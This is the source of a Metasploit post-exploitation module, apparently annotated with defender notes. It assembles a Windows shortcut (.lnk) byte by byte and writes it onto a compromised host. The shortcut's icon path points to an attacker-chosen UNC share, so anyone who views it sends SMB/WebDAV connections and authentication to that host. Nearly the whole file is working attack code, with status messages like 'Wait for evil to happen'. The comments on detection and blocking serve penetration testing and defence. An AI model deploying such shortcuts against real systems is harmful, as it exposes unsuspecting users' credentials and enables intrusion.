GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/escalate/droplnk.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for a Meterpreter session on Windows. It assembles a Shell Link
# (.lnk) file from a fixed byte template and writes it into the session's
# working directory. The only operator-controlled part of the file is the icon
# location, a UNC path built from LHOST, SHARENAME and ICONFILENAME; per the
# module description, viewing the shortcut makes the viewing user's host open
# SMB/WebDAV connections to that host.
#
# Defender notes:
# - Everything except the icon path is constant (target C:\AUTOEXEC.BAT, three
#   identical timestamps, the ASCII string 'computer'), so files produced from
#   this template share those bytes and can be matched on them.
# - A shortcut whose icon location is a UNC path to a host outside the
#   organisation is the behaviour to hunt for on shares and desktops.
# - Blocking outbound SMB (TCP 445) at the perimeter, restricting outgoing
#   NTLM to remote servers by policy, and disabling the WebClient service
#   where WebDAV is not needed remove the connection this file relies on.
class MetasploitModule < Msf::Post

  # Registers the module metadata and its four required options.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',
        'Description' => %q{
          This module drops a shortcut (LNK file) that has a ICON reference
          existing on the specified remote host, causing SMB and WebDAV
          connections to be initiated from any user that views the shortcut.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'mubix' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        # Meterpreter commands the session must support; presumably the
        # channel commands back the remote file write and stdapi_fs_getwd
        # backs the pwd lookup in #run - confirm against the framework.
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_getwd
            ]
          }
        }
      )
    )
    # LHOST has no default (nil) and is required; the other three default to
    # 'Words.lnk', 'share1' and 'icon.png'.
    register_options(
      [
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])
      ]
    )
  end

  # Builds the .lnk byte string and writes it to LNKFILENAME on the session
  # host. The name is passed to the remote file API as given, so a bare file
  # name lands in the directory reported by session.fs.dir.pwd.
  #
  # NOTE(review): file.close is not in an ensure block, so a failing write
  # leaves the remote handle open.
  def run
    print_status 'Creating evil LNK'
    lnk = ''
    # --- Shell link header (0x4c bytes) ---
    lnk << "\x4c\x00\x00\x00" # Header size
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID (00021401-0000-0000-C000-000000000046)
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
    # 0xdb sets HasLinkTargetIDList, HasLinkInfo, HasRelativePath,
    # HasWorkingDir, HasIconLocation and IsUnicode - the sections emitted below.
    lnk << "\xdb\x00\x00\x00" # Link flags
    lnk << "\x20\x00\x00\x00" # File attributes (0x20 = archive)
    # The three timestamps are the same constant value.
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time
    lnk << "\x00\x00\x00\x00" # File size
    lnk << "\x00\x00\x00\x00" # Icon index
    lnk << "\x01\x00\x00\x00" # Show command
    lnk << "\x00\x00" # Hotkey
    lnk << "\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x7b\x00" # IDListSize
    # sIDList: item list naming the constant target C:\AUTOEXEC.BAT
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
    lnk << 'C:\\'
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
    lnk << "\x00"
    lnk << 'AUTOEXEC.BAT'
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
    lnk << "\x5b\x15\x14\x00\x00\x00"
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')
    lnk << "\x00\x00\x1c\x00\x00\x00"
    # sLinkInfo: local base path for the same constant target
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    lnk << "\x00\x00\x00"
    lnk << 'C:\\AUTOEXEC.BAT'
    # 0x0e (14) is the character count of the relative path that follows.
    lnk << "\x00\x00\x0e\x00"
    # RELATIVE_PATH
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
    # 0x03 is the character count of the working directory that follows.
    lnk << "\x03\x00"
    # WORKING_DIR
    lnk << Rex::Text.to_unicode('C:\\')
    # ICON LOCATION: a constant count prefix (0x1c) followed by the UNC path
    # \\LHOST\SHARENAME\ICONFILENAME taken from the module options. This is
    # the one field in the file that points off-host.
    lnk << "\x1c\x00"
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")
    # Trailing data: looks like a tracker block (signature bytes 03 00 00 a0)
    # carrying the constant machine id 'computer' and a repeated 32-byte
    # identifier, then four zero bytes - confirm against the MS-SHLLINK layout.
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
    lnk << 'computer'
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

    # The status line reports the session's current directory plus the file
    # name; the write itself uses the file name alone, in binary mode.
    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
    file.write(lnk)
    file.close
    print_status 'Done. Wait for evil to happen..'
  end
end